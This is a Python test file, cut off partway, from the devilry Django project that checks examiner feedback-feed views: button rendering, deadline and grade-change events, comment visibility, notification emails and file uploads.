| 1
| 0.031746
| false
| 0
| 0.031746
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d86f1aca3b3d3d346e836d765c307e9ed36de05
| 50,866
|
py
|
Python
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
# -*- coding: utf-8 -*-
from datetime import timedelta
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils import timezone
from django.conf import settings
from model_bakery import baker
from devilry.devilry_comment import models as comment_models
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
from devilry.devilry_group import devilry_group_baker_factories as group_baker
from devilry.devilry_group import models as group_models
from devilry.apps.core import models as core_models
from devilry.devilry_group.tests.test_feedbackfeed.mixins import mixin_feedbackfeed_examiner
from devilry.devilry_group.views.examiner import feedbackfeed_examiner
class MixinTestFeedbackfeedExaminerDiscuss(mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
def test_get_examiner_first_attempt_feedback_tab_does_not_exist_if_last_feedbackset_is_published(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_first_attempt_feedback_tab_exist_if_last_feedbackset_is_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_new_attempt_feedback_tab_does_not_exist_if_last_feedbackset_is_published(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_new_attempt_published(
group=testgroup,
deadline_datetime=timezone.now() + timedelta(days=3))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_new_attempt_feedback_tab_exist_if_last_feedbackset_is_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_post_comment_always_to_last_feedbackset(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
grading_system_plugin_id=core_models.Assignment
.GRADING_SYSTEM_PLUGIN_ID_PASSEDFAILED)
group = baker.make('core.AssignmentGroup', parentnode=assignment)
examiner = baker.make('core.Examiner',
assignmentgroup=group,
relatedexaminer=baker.make('core.RelatedExaminer'))
feedbackset_first = group_baker.feedbackset_first_attempt_published(group=group)
feedbackset_last = group_baker.feedbackset_new_attempt_unpublished(group=group)
self.mock_http302_postrequest(
cradmin_role=examiner.assignmentgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': group.id},
requestkwargs={
'data': {
'text': 'This is a feedback',
'examiner_add_public_comment': 'unused value',
}
})
comments = group_models.GroupComment.objects.all()
self.assertEqual(len(comments), 1)
self.assertNotEqual(feedbackset_first, comments[0].feedback_set)
self.assertEqual(feedbackset_last, comments[0].feedback_set)
self.assertEqual(2, group_models.FeedbackSet.objects.count())
def test_event_deadline_moved_feedbackset_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
now1 = timezone.now()
new_deadline1 = now1 + timedelta(days=2)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now1,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline1)
now2 = timezone.now() + timedelta(days=2)
new_deadline2 = now2 + timedelta(days=4)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now2,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline2)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertEqual(mockresponse.selector.count('.devilry-group-feedbackfeed-event-message__deadline-moved'), 2)
self.assertEqual(mockresponse.selector.count('.deadline-move-info'), 2)
def test_event_deadline_moved_feedbackset_published(self):
testgroup = baker.make('core.AssignmentGroup')
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
testfeedbackset = group_baker.feedbackset_first_attempt_published(group=testgroup)
now1 = timezone.now()
new_deadline1 = now1 + timedelta(days=2)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now1,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline1)
now2 = timezone.now() + timedelta(days=2)
new_deadline2 = now2 + timedelta(days=4)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now2,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline2)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertEqual(mockresponse.selector.count('.devilry-group-feedbackfeed-event-message__deadline-moved'), 2)
self.assertEqual(mockresponse.selector.count('.deadline-move-info'), 2)
def test_get_feedbackset_header_grading_info_passed(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=1)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(mockresponse.selector.one('.header-grading-info').alltext_normalized, 'passed (1/1)')
def test_get_feedbackset_header_grading_info_failed(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=0)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(mockresponse.selector.one('.header-grading-info').alltext_normalized, 'failed (0/1)')
def test_get_feedbackset_header_buttons_not_graded(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-move-deadline-button').alltext_normalized,
'Move deadline')
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-edit-button'))
self.assertNotContains(mockresponse.response, 'Edit grade')
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
self.assertNotContains(mockresponse.response, 'Give new attempt')
def test_get_feedbackset_published_move_deadline_button_not_rendered(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertFalse(
mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-last-edit-button').alltext_normalized,
'Edit grade')
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-last-new-attempt-button').alltext_normalized,
'Give new attempt')
def test_get_feedbackset_not_published_only_move_deadline_button_shows(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-move-deadline-button').alltext_normalized,
'Move deadline')
def test_get_feedbackset_grading_updated_multiple_events_rendered(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='test@example.com', fullname='Test User')
test_feedbackset = group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=1)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=1,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=0,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=1,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=0,
updated_by=testuser)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup
)
event_text_list = [element.alltext_normalized for element in
mockresponse.selector.list('.devilry-group-event__grading_updated')]
self.assertEqual(len(event_text_list), 4)
self.assertIn('The grade was changed from passed (1/1) to failed (0/1) by Test User(test@example.com)', event_text_list[0])
self.assertIn('The grade was changed from failed (0/1) to passed (1/1) by Test User(test@example.com)', event_text_list[1])
self.assertIn('The grade was changed from passed (1/1) to failed (0/1) by Test User(test@example.com)', event_text_list[2])
self.assertIn('The grade was changed from failed (0/1) to passed (1/1) by Test User(test@example.com)', event_text_list[3])
class TestFeedbackfeedExaminerPublicDiscuss(TestCase, MixinTestFeedbackfeedExaminerDiscuss):
viewclass = feedbackfeed_examiner.ExaminerPublicDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_get_examiner_add_comment_button(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('#submit-id-examiner_add_public_comment'))
self.assertEqual(
'Add comment',
mockresponse.selector.one('#submit-id-examiner_add_public_comment').alltext_normalized
)
def test_get_examiner_form_heading(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-form-heading'))
self.assertEqual(
'Discuss with the student(s). Anything you write or upload here is visible to the student(s), '
'co-examiners (if any), and admins, but it is not considered part of your feedback/grading.',
mockresponse.selector.one('.devilry-group-feedbackfeed-form-heading').alltext_normalized
)
def test_post_comment_mail_sent_to_everyone_in_group_sanity(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner_email = baker.make('devilry_account.UserEmail', user=examiner.relatedexaminer.user,
email='examiner@example.com')
# Create two examiners with mails
examiner1 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner1_email = baker.make('devilry_account.UserEmail', user=examiner1.relatedexaminer.user,
email='examiner1@example.com')
examiner2 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner2_email = baker.make('devilry_account.UserEmail', user=examiner2.relatedexaminer.user,
email='examiner2@example.com')
# Create two students with mails
student1 = baker.make('core.Candidate', assignment_group=testgroup)
student1_email = baker.make('devilry_account.UserEmail', user=student1.relatedstudent.user,
email='student1@example.com')
student2 = baker.make('core.Candidate', assignment_group=testgroup)
student2_email = baker.make('devilry_account.UserEmail', user=student2.relatedstudent.user,
email='student2@example.com')
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(len(mail.outbox), 4)
recipient_list = []
for outbox in mail.outbox:
recipient_list.append(outbox.recipients()[0])
self.assertIn(examiner1_email.email, recipient_list)
self.assertIn(examiner2_email.email, recipient_list)
self.assertIn(student1_email.email, recipient_list)
self.assertIn(student2_email.email, recipient_list)
self.assertNotIn(examiner_email.email, recipient_list)
def test_post_first_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_first_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
class TestFeedbackfeedExaminerWithAdminDiscuss(TestCase, MixinTestFeedbackfeedExaminerDiscuss):
viewclass = feedbackfeed_examiner.ExaminerWithAdminsDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_get_examiner_add_comment_button(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('#submit-id-examiner_add_comment_for_examiners_and_admins'))
self.assertEqual(
'Add note',
mockresponse.selector.one('#submit-id-examiner_add_comment_for_examiners_and_admins').alltext_normalized
)
def test_get_examiner_form_heading(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-form-heading'))
self.assertEqual(
'Internal notes for this student or project group. Visible only to you, your co-examiners (if any) '
'and admins. Students can not see these notes.',
mockresponse.selector.one('.devilry-group-feedbackfeed-form-heading').alltext_normalized
)
def test_post_comment_mail_only_sent_to_examiners(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner_email = baker.make('devilry_account.UserEmail', user=examiner.relatedexaminer.user,
email='examiner@example.com')
# Create two examiners with mails
examiner1 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner1_email = baker.make('devilry_account.UserEmail', user=examiner1.relatedexaminer.user,
email='examiner1@example.com')
examiner2 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner2_email = baker.make('devilry_account.UserEmail', user=examiner2.relatedexaminer.user,
email='examiner2@example.com')
# Create two students with mails
student1 = baker.make('core.Candidate', assignment_group=testgroup)
student1_email = baker.make('devilry_account.UserEmail', user=student1.relatedstudent.user,
email='student1@example.com')
student2 = baker.make('core.Candidate', assignment_group=testgroup)
student2_email = baker.make('devilry_account.UserEmail', user=student2.relatedstudent.user,
email='student2@example.com')
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(len(mail.outbox), 2)
recipient_list = []
for outbox in mail.outbox:
recipient_list.append(outbox.recipients()[0])
self.assertIn(examiner1_email.email, recipient_list)
self.assertIn(examiner2_email.email, recipient_list)
self.assertNotIn(student1_email.email, recipient_list)
self.assertNotIn(student2_email.email, recipient_list)
self.assertNotIn(examiner_email.email, recipient_list)
def test_post_first_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_first_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
class TestFeedbackfeedPublicDiscussFileUploadExaminer(TestCase,
mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
viewclass = feedbackfeed_examiner.ExaminerPublicDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_comment_without_text_or_file_visibility_everyone(self):
# Tests that error message pops up if trying to post a comment without either text or file.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
mockresponse = self.mock_http200_postrequest_htmls(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_public_comment': 'unused value'
}
})
self.assertEqual(0, group_models.GroupComment.objects.count())
self.assertEqual(
'A comment must have either text or a file attached, or both. An empty comment is not allowed.',
mockresponse.selector.one('#error_1_id_text').alltext_normalized)
def test_upload_single_file_visibility_everyone(self):
# Test that a CommentFile is created on upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfile(
user=testexaminer.relatedexaminer.user)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(1, comment_models.CommentFile.objects.count())
def test_upload_single_file_content_visibility_everyone(self):
# Test the content of a CommentFile after upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile.txt', content=b'Test content', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, comment_models.CommentFile.objects.count())
comment_file = comment_models.CommentFile.objects.all()[0]
group_comment = group_models.GroupComment.objects.get(id=comment_file.comment.id)
self.assertEqual(group_comment.visibility, group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
self.assertEqual('testfile.txt', comment_file.filename)
self.assertEqual(b'Test content', comment_file.file.file.read())
self.assertEqual(len('Test content'), comment_file.filesize)
self.assertEqual('text/txt', comment_file.mimetype)
def test_upload_multiple_files_visibility_everyone(self):
# Test the content of CommentFiles after upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
def test_upload_multiple_files_contents_visibility_everyone(self):
# Test the content of a CommentFile after upload.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
comment_file1 = comment_models.CommentFile.objects.get(filename='testfile1.txt')
comment_file2 = comment_models.CommentFile.objects.get(filename='testfile2.txt')
comment_file3 = comment_models.CommentFile.objects.get(filename='testfile3.txt')
# Check content of testfile 1.
self.assertEqual('testfile1.txt', comment_file1.filename)
